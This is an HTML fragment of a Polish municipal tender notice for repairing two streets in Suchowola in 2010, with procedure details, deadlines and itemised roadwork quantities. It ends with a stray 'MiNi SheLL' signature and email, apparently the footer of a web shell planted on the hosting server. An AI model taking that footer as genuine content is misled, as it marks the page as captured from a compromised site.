f)	pełnomocnictwo do reprezentowania Wykonawców, w przypadku Wykonawców wspólnie ubiegających się o zamówienie zgodnie z zapisem punktu 10 niniejszej IDW.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.suchowola.wrotapodlasia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Suchowoli, Plac Kościuszki 5, 16-150 Suchowola, pokój 103.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2010 godzina 10:00, miejsce: Urząd Miejski w Suchowoli, Plac Kościuszki 5, 16-150 Suchowola, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont ulicy 3-go Maja w Suchowoli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,2814km
- Mech. rozebranie nawierzchni z masy min. bitumicznej grubości 4cm. wraz z transportem gruzu na odl. do 1 km - 3,5m2,
- Ręczne rozebranie krawężnika 15x30 na ul.3-go Maja - 18,2m,
- Ręczne rozebranie nawierzchni z kostki brukowej bet. - 55,7m2,
- Mechaniczne rozebranie nawierzchni z bet. Gr.15cm z odwiezieniem materiałów na odległość 1km - 2,2m2,
- Roboty ziemne wykonane koparkami podsiębiernymi w gruncie kat. III i IV z transportem Urobku na odkład na odl. do1km.w/g tabeli robót ziemnych 1178,78m3,
- Wykonanie nasypów mechanicznie w gruncie kat. III w/g tabeli robót ziemnych-10,76m3,
- Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane w gr. kat. II-IV -obmiar jak warstwy nawierzchni,
- Wykonanie koryta ręcznie na szerokości chodników głębokości 10cm.- 53,76m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. gr. 15 cm wraz z transportem i zagęszczeniem w lokalizacji na wjazdach zgodnie z wykazem wjazdów -116,8m2,
- Wykonanie i zagęszczenie warstwy piasku w korycie gr. 15cm w lokalizacji na ulicy 3-go Maja 1703,6m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. dolna gr. 20 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. 3-go Maja 1703,6m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. górna gr. 10 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. 3-go Maja 1703,6m2,
- Mechaniczne oczyszczenie warstw konstrukcyjnych nieulepszonych - na ul. 3-go Maja 1703,6m2,
- Skropienie mechaniczne warstw konstrukcyjnych emulsją asfaltową - na ul. 3-go Maja 1703,6m2,
- Wykonanie warstwy wiążącej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - na ul. 3-go Maja 1703,6m2,
- Wykonanie warstwy ścieralnej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - na ul. 3-go Maja 1703,6m2,
- Regulacja pionowa studzienek dla urządzeń podziemnych, zawory wodociągowe szt.4,
- Regulacja pionowa studzienek dla urządzeń podziemnych, studnie kanalizacyjne na ul. 3-go Maja- szt.6.
- Chodniki z płyt betonowych o wymiarach 35x35x5 cm na
posypce piaskowej, spoiny wypełnione piaskiem
Na ulicy 3-go Maja 410,18m2,
- Ustawienie krawężników betonowych 15x30 na ławie z oporem z betonu B-15 z wypełnieniem spoin zaprawą cementową - na ul.3-go Maja str. lewa 622,m
- Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - Str. lewa 278,7m + str. prawa 12,6m RAZEM : 291,3m,
- Place z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce cem. - piaskowej z wypełnieniem spoin piaskiem na wjazdach wg wykazu wjazdów -116 8m2 + na parkingu
56,7m2+ 3,2m2+88,4m2=148,3m2 RAZEM : 265,1m2, 
- Ustawienie obrzeży betonowych 8x30 na podsypce cem.- piask. z wypełnieniem spoin zaprawą cementową na wjazdach wg wykazu wjazdów -67,5mb,
- Ustawienie słupków z rur stalowych o60mm długości 3,80m dla znaków drogowych z wykonaniem i zasypaniem dołów,
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu B wielkości średniej z folii II generacji na ul.3-go Maja B-20 -szt.1, 
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu D wielkości średniej z folii I generacji na ul.3-go Maja D-18 -szt.1, 
- Wykonanie trawników dywanowych siewem z uprzednim humusowaniem torfem ogrodniczym warstwą gr 2 cm na ul.3- go Maja  119,7m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.20-6, 45.10.00.00-8, 45.11.27.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont ulicy Rzemieślniczej w Suchowoli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym 0,1462km,
- Mech. rozebranie nawierzchni z masy min. bitumicznej grubości 4cm. wraz z transportem gruzu na odl. do 1 km. Na początku trasy po przekopach kanalizacyjnych - 32,5m2, 
- Rozebranie obrzeży betonowych 6X20 z transportem gruzu
na odl. do 1 km - 5,0m,
- Ręczne rozebranie nawierzchni z kostki brukowej bet. 1,4m2,
- Roboty ziemne wykonane koparkami podsiębiernymi w gruncie kat. III i IV z transportem urobku na odkład na odl. do 1km.w/g tabeli robót ziemnych-516,8m3,
- Wykonanie nasypów mechanicznie w gruncie kat. III w/g tabeli robót ziemnych-2,40m3,
- Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane w gr. kat. II-IV -obmiar jak warstwy nawierzchni,
- Wykonanie koryta ręcznie na szerokości chodników głębokości 10cm.- 84,1m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. gr. 15 cm wraz z transportem i zagęszczeniem w lokalizacji na wjazdach zgodnie z wykazem wjazdów -71,6m2,
- Wykonanie i zagęszczenie warstwy piasku w korycie gr. 15cm w lokalizacji na ulicy Rzemieślniczej 825,8m2 + na chodniku wzmocnionym 42,0m2 = 867,8m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. dolna gr. 20 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. Rzemieślniczej 825,8m2,
- Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mech. w. górna gr. 10 cm wraz z transportem i zagęszczeniem w lokalizacji na ul. Rzemieślniczej 825,8m2 + na chodniku wzmocnionym 42,0m2 = 867,8m2,
- Mechaniczne oczyszczenie warstw konstrukcyjnych nieulepszonych - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Skropienie mechaniczne warstw konstrukcyjnych emulsją asfaltową - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Wykonanie warstwy wiążącej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Wykonanie warstwy ścieralnej gr. 4 cm z miesz. min.-asf. z transportem z odl. 15km. - 164,2x5,6 + wlot z drogi bocznej 7,1m2 odcinek po przekopach kanalizacyjnych 56,5m2 = 882,32m2,
- Regulacja pionowa studzienek dla urządzeń podziemnych, zawory wodociągowe szt.2
- Wykonanie nawierzchni żwirowej - grubość warstwy po zagęszczeniu 15cm. na zjeździe po stronie prawej - 13,8m2,
- Chodniki z płyt betonowych o wymiarach 35x35x5 cm na posypce piaskowej, spoiny wypełnione piaskiem str. lewa 84,5m2,
- Ustawienie krawężników betonowych 15x30 na ławie z oporem z betonu B-15 z wypełnieniem spoin zaprawą cementową-151m,
- Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 82,05m,
-Place z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce cem. - piaskowej z wypełnieniem spoin piaskiem na wjazdach wg wykazu wjazdów - 29,6m2 + na chodniku
wzmocnionym 40,0x1,05= 42,0m2 RAZEM : 71,6m2,
-  Ustawienie obrzeży betonowych 8x30 na podsypce cem-piask. z wypełnieniem spoin zaprawą cementową na wjazdach wg wykazu wjazdów 20,9m + 42,0mb RAZEM: 63mb,
- Ustawienie słupków z rur stalowych o60mm dla znaków drogowych z wykonaniem i zasypaniem dołów - 4 szt.,
- Przymocowanie do gotowych słupków znaków informacyjnych i miejscowości typu D wielkości średniej z folii I generacji na ul. Rzemieślniczej D-42 -szt.1, D-43 -szt.1, E-17a -szt.1, E-18a - szt.1 RAZEM : szt.4,
- Wykonanie trawników dywanowych siewem z uprzednim humusowaniem torfem ogrodniczym warstwą gr 2 cm na ul. Rzemieślniczej 6,8m2+ 11,2m2= 18,0m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.20-6, 45.10.00.00-8, 45.11.27.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com